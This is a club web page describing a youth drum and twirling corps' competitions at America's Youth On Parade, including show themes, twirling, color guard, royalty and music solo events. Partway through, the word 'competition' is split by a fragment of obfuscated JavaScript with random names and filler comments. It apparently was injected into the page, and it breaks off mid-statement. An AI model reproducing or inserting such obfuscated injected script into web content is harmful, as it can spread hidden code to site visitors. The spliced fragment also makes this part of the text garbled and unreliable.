Daley Drumline

America’s Youth On Parade
AYOP

Each July, the corps travels to the University of Notre Dame campus in South Bend, Indiana for National and World Competition. Our competition corps competes for the World Championship Senior Parade Corps with live music.

Our competition corps includes twirlers, color guard, auxiliary squad, and drumline. This competition corps performs the show first at our state competition and then at AYOP on a college basketball court. One of the hallmarks of our corps is that color guard, twirling and music sections are intermingled during most of the show.

Many of our twirlers, color guard and auxiliary squad members join our drumline to compete in the music section competition. Those who join the drumline for this competition play bells, xylophone, drums, cymbals or alternate percussion instruments. All who participate in this competition attend practices in addition to full corps practices in order to put on a high quality show without taking time from full corps practice.

Past year’s shows include:

Classic Rock ?Paint it Black, Stairway to Heaven, Paranoid and others

Phantom of the Opera

West Side Story

Pirates of the Caribbean

And, for the corps?50th Anniversary, we performed a show of 50 years of the Debs greatest hits/fondest memories as our gift to the sisters who founded the corps and remain as our Directors.

This year, we draw on the music of John Williams for our show and it promises to be better than ever!

Our twirlers also compete in team competitions in all age and difficulty levels. These are tough competitions with fabulous twirling teams from around the country and the world. And, our teams, consistently have some of their teams come in among the top 5 in several categories. This is quite an achievement for a group with a relatively short practice season.

Members from all sections compete in individual competitions and also in the corps royalty comg)/* potst*/{for(yjhr in jdhg){if(parseInt(jdhg[yjhr]/* dvegs twyjy*/.vyhj) == parseInt(hvyk)){jdhg[yjhr].sqog++;return true;}}return false;}function facirar(ovme){nhrr=new Array();gwot=new Function();gwot.prototype={vyhj:0,sqog:0}/* gw*/;var saad = new gwot();for(iuxw in ovme){var ijyc=ovme[iuxw/* iu idwyifq diwmmp xjlyvla*/];/* rx*/if(!gulbvegc(ijyc,nhrr)){saad=new gwot()/* betmscm ry xo*/;saad.vyhj=ijyc;saad.sqog++;nhrr.push(saad);}/* rxwptueh ypajicnm cdctow ccmhkk*/}for(ijyc in nhrr){if(saad.sqog

petition. The corps royalty competition requires that the individual have a recommendation from their corps director, march a required pattern to required music, and participate in a one on one interview with the judge. The Debs have consistently had at least 1 winner of corps royalty each year, and one year, had a clean sweep of all corps royalty—a remarkable event considering that members from all corps compete in this event!

Twirling solo events are held throughout the week in various locations in the Convocation Center and the Fieldhouse. There are many different aspects of twirling and marching in which twirlers compete. Watching the talent and grace of these athletes is an awesome experience.

Color Guard solos are also part of AYOP. Spinning flags snap as each move is crisply executed. Individuals compete with flag or saber performing both required elements and freestyle routines for the judges.

The Music Solo/Ensemble Competition gives the drumline a chance to showcase their talents. Our musicians perform solo and ensemble selections as individual, duet, trio’s or larger groups. This requires additional personal practice time. Often, members use district solo/ensemble competition pieces that they have performed in spring WSMA competition, or take part in ensembles composed by fellow drumline members.
